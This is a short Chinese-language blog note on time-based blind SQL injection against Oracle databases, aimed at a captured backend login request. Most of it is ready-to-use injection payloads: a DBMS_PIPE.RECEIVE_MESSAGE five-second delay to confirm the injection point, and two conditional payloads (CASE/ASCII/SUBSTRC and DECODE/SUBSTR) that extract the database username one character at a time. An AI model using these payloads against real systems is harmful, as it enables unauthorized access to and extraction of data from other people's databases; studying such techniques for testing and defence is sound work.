美文网首页
Oracle基于延时的盲注笔记

Oracle基于延时的盲注笔记

作者: 时光与她Time | 来源:发表于2020-02-18 16:48 被阅读0次

    oracle时间盲注DBMS_PIPE.RECEIVE_MESSAGE注入语句,

    后台登录框抓包

    利用  'and 1=(DBMS_PIPE.RECEIVE_MESSAGE('a',5)) and '1'='1  延时5秒判断注入点存在

    利用  ' AND 7238=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1))>73) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(106)||CHR(72)||CHR(73),5) ELSE 7238 END) AND '1'='1

    或者  'and 1=(select decode(substr(user,1,1),'I',DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) ,0) from dual) and '1'='1  这两条语句都可以猜解数据库用户名

    数据库猜到第三位 I  延时5秒,

    相关文章

      网友评论

          本文标题:Oracle基于延时的盲注笔记

          本文链接:https://www.haomeiwen.com/subject/gzngfhtx.html